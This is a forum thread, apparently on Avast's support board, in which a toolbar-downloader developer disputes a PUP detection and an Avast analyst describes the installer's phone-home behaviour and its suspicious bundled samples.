I emailed virus [at] avast.com a few days ago to inquire about a false positive regarding a downloader. VirusTotal is showing that only Avast5 is flagging the downloader (Report: http://www.virustotal.com/file-scan/report.html?id=504ea5b7b4815d0ef8e9fb68245d14c800201ff7b3ed4f1cca7fbc31ea8cf0cd-1314820733 ) and I’d like to see what we can do to get it removed from being flagged. The downloader asks the user for consent and delivers a toolbar depending on which country your IP address is from. The toolbar delivered contains uninstall via the add/remove programs and in the start/programfiles menu as well. Our downloader has been clean from AV’s/malware for almost a year until some of our users informed me of this. Is there a way to send our exe such that someone can review this as I had no reply from the email address above?
You can send it in a password protected zip to virus@avast.com. Please, mention in the body of the message why you think it is a false positive and the password used. Thanks.
As a workaround, you can add these files to the Files Shield exclusion list.
Left click the ‘a’ orange icon, click on the Real-Time Shields folder at left > File Shield > Expert Settings > Exclusions > Add.
You can use wildcards like * and ?. But be careful, you should ‘exclude’ that many files that let your system in danger.
You can also add it to the general exclusion list (on demand scannings). Left click the ‘a’ orange icon, click on Settings button > Exclusions > Add.
If it’s PUP, there’s no such thing as false positive. User can decide if he wants or not. Generally said, this is a protection against small print eulas, default checkboxes and potential cripplewares (don’t know if it is exactly this case, haven’t checked it). But the mere word ‘toolbar’ rings a bell.
Its just a downloader, the actual product being downloaded are all clean. The downloader asks the user if they wish to download or cancel. If they allow the download, it downloads and then presents the EULA/instructions. If they hit cancel, that’s it, it cancels. Its a very simple download setup and we’ve never had it flagged in over a year and its just Avast5 that’s flagging it. No replies from Avast since I uploaded it / emailed them.
The word PUP says it all. Possibly Unwanted Program. If you think it is unwanted, want to load it sandboxed or remove it completely from your computer, that decision rests with you, the user only. If you have installed it yourself and know why you downloaded and installed it, it cannot be a PUP. If it was installed without your knowledge, you might decide it is a PUP indeed. System admins may decide that you cannot install a PUP as a rule, a form of general policy. In that case as a click-worker you have to abide by that rule,
I don’t see how its an unwanted app, the user downloaded it and we ask the user if they’re sure they want to install it and we give them the option to opt-out. I can understand if the user doesn’t want a toolbar and considers it unwanted, but this is the downloader for the toolbars. The toolbars themselves are 100% clean so doesn’t it make sense the downloader would be too? I can understand if the toolbar itself is flagged as a PUP but not the downloader? Especially one that asks for permission and gives the option to abort at any time?
The detection is from 23rd aug. We have exactly 0 hits of this detection in our statistics. This, somehow contradicts with what you say (users noticing). I’m not surprised, this is quite low profile, and also, PUPs are not the default.
Installer script contains blocked url - socialinstalls.com. This is some form of call home. The domain was blocked along with some black SEO operations.
ABOUT DOMAIN:
The domain has no contact info, and with or without www. redirects to two completely different weird looking sites. No contact info then.
Shares server with now-pay.com, also no domain contact info. chatsociety.com (red WOT) - Wired2000 profileprivacy.com (green WOT) - no domain contact info
ABOUT OTHER SAMPLES:
I see some filenames of software using this domain. The first is “avast profesional rar serials.exe”. Ehm.
I found one of samples in our collections. Came as 11mb long file, under “Photoshop Windows” and “Call of Duty Black Ops”. Aside from the fact they can’t be only 11MBs, and, can’t be in the same file. Contains only the script, and ~11mbs of binary thrash.
ABOUT YOUR SAMPLE:
The file you’ve sent to VT is almost same - just the affiliate ID in the url is different. You’ve used A2.
This then downloads some software contained on socialinstalls site - in my case it was IMPF.exe
IMPF.exe is again NSIS installer which phones home, and then runs another NSIS installer PhotoFun.exe.
This most probably means Iminent PhotoFun, and it’s from this site: hxxp://photofunapp.com. WOT grey, affiliate program, no company info or contact, domain info just “zy internet solutions”.
Now I’m tempted to change it from PUP to malware detection.
About the domain: SocialInstalls is the url used to determine which installer you’ll get. Depending on your country of origin, you will get a different toolbar. Cookies is also used to determine number of times we’ve seen the user. I have no idea what this now-pay.com domain is, we don’t share IP’s and have dedicated IP’s. The domains chatsociety and profileprivacy are default redirectors that are used when the installer fails to determine your intended product. The installer makes a request attached with a few parameters to determine what the intended product was (a downloader, an IM tool, language translation, etc). Without these parameters, we redirect to a default landing page since we don’t know what you were looking for.
“avast profesional rar serials.exe”, “Photoshop Windows” and “Call of Duty Black Ops”, I have no idea what these are or why they’re 11 megs. Our installer is less than 50kb large, but they’re not originating from our socialinstalls domain name as far as I can tell. Sounds like someone is attaching our binary to something else, but our binary is clean.
PhotoFun and Iminent IMBooster are packaged together as a request for an IM package, this sounds like you ran the software with campaign ID 140 and tracking source “A” or “A2”. But nevertheless, I don’t see how this is malware. It sounds like the exe’s you found came from someone else and has our exe included in the package as our exe is just 50kb, not 11 meg, and I have no idea why they’re called those names like photoshop or Call of Duty.